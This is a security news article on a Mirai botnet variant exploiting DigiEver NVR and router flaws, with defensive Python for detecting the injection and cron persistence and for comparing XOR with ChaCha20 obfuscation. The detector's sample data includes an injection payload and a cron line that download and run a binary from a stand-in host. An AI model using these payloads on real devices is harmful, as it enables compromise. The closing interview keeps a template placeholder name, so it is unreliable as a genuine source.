New Mirai Botnet Targets Unpatched NVRs and Routers with RCE Exploits

New Mirai Botnet Preys on Vulnerable Network Devices

A new strain of the infamous Mirai botnet has been detected, actively targeting vulnerabilities in network video recorders (NVRs) and routers running outdated firmware. The campaign, reported as starting in October, exploits a previously undocumented vulnerability in DigiEver DS-2105 Pro NVRs, along with known flaws in TP-Link routers and Teltonika RUT9XX routers. Security researchers at Akamai first noticed the new botnet in mid-November, but evidence suggests the attacks have been ongoing since at least September. One of the vulnerabilities leveraged in the campaign was highlighted by TXOne researcher Ta-lun Yen at the DefCamp security conference last year.

Exploiting DigiEver NVRs

The DigiEver vulnerability is a remote code execution (RCE) flaw: because of improper input validation, attackers can inject commands into the '/cgi-bin/cgi_main.cgi' URI. Remote, unauthenticated attackers can thereby execute commands such as 'curl' and 'chmod' through specific parameters in HTTP POST requests. Akamai researchers confirmed that these attacks mirror the techniques Yen demonstrated in his presentation. Successful exploitation downloads the malware binary from a remote server and enrolls the compromised device in the botnet. To maintain persistence, the attackers install cron jobs on the infected device.

Once under the botnet's control, compromised devices can be used to launch distributed denial of service (DDoS) attacks or to spread the malware further by exploiting known vulnerabilities and using credential lists. What sets this Mirai variant apart is its use of XOR and ChaCha20 encryption, which, according to Akamai, highlights the evolving sophistication of Mirai-based botnet operators.
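The exploitation pattern above (command injection into the cgi_main.cgi endpoint via POST parameters, a curl-and-chmod download stage, then cron for persistence) can be turned into simple detection logic. The following is an added example written for this article; it is not Akamai's code and not their published IoCs or YARA rules. The HTTP requests and the crontab it scans are constructed for illustration, and the form-field names (`cgiName`, `server`) are assumptions, since the article does not name the vulnerable parameter.

```python
"""Heuristic detection for command injection against /cgi-bin/cgi_main.cgi
and for cron-based persistence on the device.

Added example, not Akamai's code. Sample requests, field names and the
crontab are constructed for illustration.
"""
import re
from urllib.parse import parse_qsl

TARGET_URI = "/cgi-bin/cgi_main.cgi"

# Shell metacharacters that let a value break out of the command the CGI builds
# and append a second command (the injection primitive the article describes).
SHELL_META = re.compile(r"[;&|`$\n]")

# Tooling the article reports the bot using (curl, chmod). wget, sh and busybox
# are assumptions added because they are the usual substitutes on embedded Linux.
TOOLING = re.compile(r"\b(curl|wget|chmod|sh|busybox)\b")


def suspicious_params(body: str) -> dict:
    """Return {field: decoded value} for each POST field that looks like an injection.

    parse_qsl percent-decodes, so an encoded ';' (%3B) is caught like a raw one.
    """
    hits = {}
    for field, value in parse_qsl(body, keep_blank_values=True):
        if SHELL_META.search(value) and TOOLING.search(value):
            hits[field] = value
    return hits


def inspect_request(method: str, path: str, body: str) -> dict:
    """Flag one request against the vulnerable CGI endpoint.

    Returns an empty dict when the request does not match, otherwise the
    suspicious fields with their decoded values.
    """
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_URI:
        return {}
    return suspicious_params(body)


def scan_requests(requests) -> list:
    """Run inspect_request over (method, path, body) tuples; return (index, hits) pairs."""
    return [(i, hits) for i, (m, p, b) in enumerate(requests) if (hits := inspect_request(m, p, b))]


# Persistence check: the article says the bot installs cron jobs. A cron entry
# that fetches from a URL or runs something out of a world-writable scratch
# directory is worth a look on an NVR that should never do either.
CRON_SUSPICIOUS = re.compile(r"(https?://|/tmp/|/var/tmp/|/dev/shm/|\bcurl\b|\bwget\b)")


def suspicious_cron_lines(crontab_text: str) -> list:
    """Return the non-comment crontab lines matching CRON_SUSPICIOUS."""
    out = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and CRON_SUSPICIOUS.search(line):
            out.append(line)
    return out


# Constructed sample traffic: an ordinary settings save, an injection attempt
# (payload encoded the way a browser or curl sends a form), and an unrelated GET.
SAMPLE_REQUESTS = [
    ("POST", TARGET_URI, "cgiName=time&server=time.example.net"),
    ("POST", TARGET_URI,
     "cgiName=time&server=time.example.net%3Bcurl+-o+%2Ftmp%2Fx+http%3A%2F%2F203.0.113.5%2Fx"
     "%3Bchmod+%2Bx+%2Ftmp%2Fx%3B%2Ftmp%2Fx"),
    ("GET", "/index.html", ""),
]

# Constructed sample crontab: one legitimate job, two planted by an attacker.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://203.0.113.5/x -o /tmp/x && chmod +x /tmp/x && /tmp/x
@reboot /tmp/.x
"""

if __name__ == "__main__":
    for idx, hits in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: injection in {hits}")
    for entry in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("suspicious cron entry:", entry)
```

The request check is meant to run over decoded bodies from a reverse proxy, IDS or packet capture in front of the NVR, since plain access logs do not record POST bodies. The cron check is a host-side triage step for devices you suspect are already enrolled.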

“Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” comments Akamai.

They also noted that many Mirai-based botnets still rely on the original string obfuscation logic found in the initial Mirai source code release, which makes this variant's encryption approach noteworthy. In addition to the DigiEver flaw, the botnet exploits CVE-2018-17532, a vulnerability in Teltonika RUT9XX routers, and CVE-2023-1389, which affects TP-Link devices. Akamai has published indicators of compromise (IoCs) and YARA rules to help detect and block this threat.
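To make the contrast concrete, the block below puts the original Mirai string obfuscation next to ChaCha20. It is an added illustration for this article, not Akamai's code and not the new variant's actual routine (the article does not describe how the variant derives or stores its key). The XOR scheme follows the leaked Mirai source, whose table entries are unlocked by XORing every byte with each byte of the constant 0xDEADBEEF; the ChaCha20 key, nonce and the sample string are constructed for illustration.

```python
"""Original Mirai table obfuscation beside ChaCha20 string encryption.

Added example, not Akamai's code and not the variant's routine. The XOR
constant comes from the leaked Mirai source; the ChaCha20 key, nonce and
sample string are assumed values for illustration.
"""
import struct

MIRAI_TABLE_KEY = 0xDEADBEEF  # constant from the leaked Mirai source (table.c)


def mirai_toggle_obf(data: bytes, key: int = MIRAI_TABLE_KEY) -> bytes:
    """XOR every byte with each of the four key bytes, as Mirai's toggle_obf() does.

    XORing with k1, k2, k3, k4 in turn equals XORing with k1^k2^k3^k4, so the
    whole table is really protected by one byte (0x22 for 0xDEADBEEF).
    The function is its own inverse.
    """
    k = [(key >> shift) & 0xFF for shift in (0, 8, 16, 24)]
    return bytes(b ^ k[0] ^ k[1] ^ k[2] ^ k[3] for b in data)


def brute_force_xor_key(blob: bytes) -> list:
    """Single-byte XOR keys under which every byte of blob decodes to printable ASCII."""
    return [k for k in range(256) if all(0x20 <= (b ^ k) < 0x7F for b in blob)]


# --- ChaCha20 (RFC 8439), enough to show why the newer scheme resists the trick above ---

def _rotl32(v: int, n: int) -> int:
    return ((v << n) & 0xFFFFFFFF) | (v >> (32 - n))


def quarter_round(s: list, a: int, b: int, c: int, d: int) -> None:
    """In-place ChaCha quarter round on state words a, b, c, d."""
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """One 64-byte keystream block for a 32-byte key and 12-byte nonce."""
    state = (list(struct.unpack("<4I", b"expand 32-byte k"))
             + list(struct.unpack("<8I", key)) + [counter]
             + list(struct.unpack("<3I", nonce)))
    w = state[:]
    for _ in range(10):  # 10 double rounds = 20 rounds
        quarter_round(w, 0, 4, 8, 12); quarter_round(w, 1, 5, 9, 13)
        quarter_round(w, 2, 6, 10, 14); quarter_round(w, 3, 7, 11, 15)
        quarter_round(w, 0, 5, 10, 15); quarter_round(w, 1, 6, 11, 12)
        quarter_round(w, 2, 7, 8, 13); quarter_round(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((x + y) & 0xFFFFFFFF for x, y in zip(w, state)))


def chacha20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 1) -> bytes:
    """Encrypt or decrypt (the operation is symmetric) with a ChaCha20 keystream."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, counter + off // 64, nonce)
        out += bytes(p ^ k for p, k in zip(data[off:off + 64], ks))
    return bytes(out)


# Constructed sample: a C2 hostname of the kind a Mirai table holds.
SAMPLE_STRING = b"cnc.example.net"
SAMPLE_KEY = bytes(range(32))   # assumed key, not the variant's
SAMPLE_NONCE = b"\x00" * 12     # assumed nonce, not the variant's

if __name__ == "__main__":
    old = mirai_toggle_obf(SAMPLE_STRING)
    print("Mirai XOR blob:", old.hex(),
          "-> candidate keys:", [hex(k) for k in brute_force_xor_key(old)])
    new = chacha20_xor(SAMPLE_KEY, SAMPLE_NONCE, SAMPLE_STRING)
    print("ChaCha20 blob: ", new.hex(),
          "-> decodes only with key+nonce:", chacha20_xor(SAMPLE_KEY, SAMPLE_NONCE, new))
```

The practical consequence for defenders is in the two output lines: a Mirai fork that keeps the original table can be decoded with a 256-key brute force (which is how many existing YARA rules and triage scripts recover C2 strings), whereas ChaCha20-protected strings require pulling the key and nonce out of the sample first. Signatures keyed on the classic XOR-0x22 strings will simply not fire on this variant.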

## Archyde Exclusive Interview: New Mirai Variant Targets Vulnerable Network Devices

**Archyde:** Welcome to Archyde, [Alex Reed Name]. Thanks for joining us today. We're here to discuss the alarming news of a new Mirai botnet variant targeting vulnerable network devices. Can you shed some light on what makes this development especially concerning?

**Alex Reed:** Thanks for having me. This new strain of Mirai is certainly cause for concern for both individuals and businesses. What truly sets it apart is its focused exploitation of vulnerabilities in network video recorders (NVRs) and routers. These devices are often overlooked when it comes to security hardening, making them easy targets for malicious actors.

**Archyde:** We understand this botnet has been actively exploiting a previously unknown vulnerability in DigiEver DS-2105 Pro NVRs. Can you elaborate on the nature of this vulnerability and the potential impact?

**Alex Reed:** The vulnerability in the DigiEver NVR allows attackers to remotely execute arbitrary code, essentially giving them full control over the device. This could be used to steal sensitive data like video recordings, use the NVR as part of a larger DDoS attack, or even brick the device entirely.

**Archyde:** Beyond DigiEver NVRs, are there other devices being targeted?

**Alex Reed:** Yes, this Mirai variant has also been observed exploiting known vulnerabilities in TP-Link routers and Teltonika RUT9XX routers. These older devices often have outdated firmware, leaving them susceptible to attacks.

**Archyde:** The fact that this campaign launched as early as September, but was only recently detected by security researchers, is worrying. What does this say about the evolving threat landscape?

**Alex Reed:** It underscores the need for constant vigilance and proactive security measures. Malicious actors are constantly evolving their tactics, targeting new vulnerabilities and exploiting weaknesses in outdated devices.

**Archyde:** What are some practical steps that individuals and businesses can take to mitigate their risk?

**Alex Reed:**

* **Keep your firmware updated:** Regularly update the firmware on your NVRs, routers, and other network devices to patch known vulnerabilities.
* **Secure access:** Use strong passwords and enable multi-factor authentication wherever possible.
* **Network segmentation:** Segment your network to isolate critical devices from less secure ones.
* **Monitor network traffic:** Implement intrusion detection systems to monitor for unusual activity.

**Archyde:** Thank you, [Alex Reed Name], for providing valuable insights into this emerging threat. Your advice will certainly be helpful for our viewers in protecting themselves.

**Alex Reed:** You're welcome.

*End Interview*
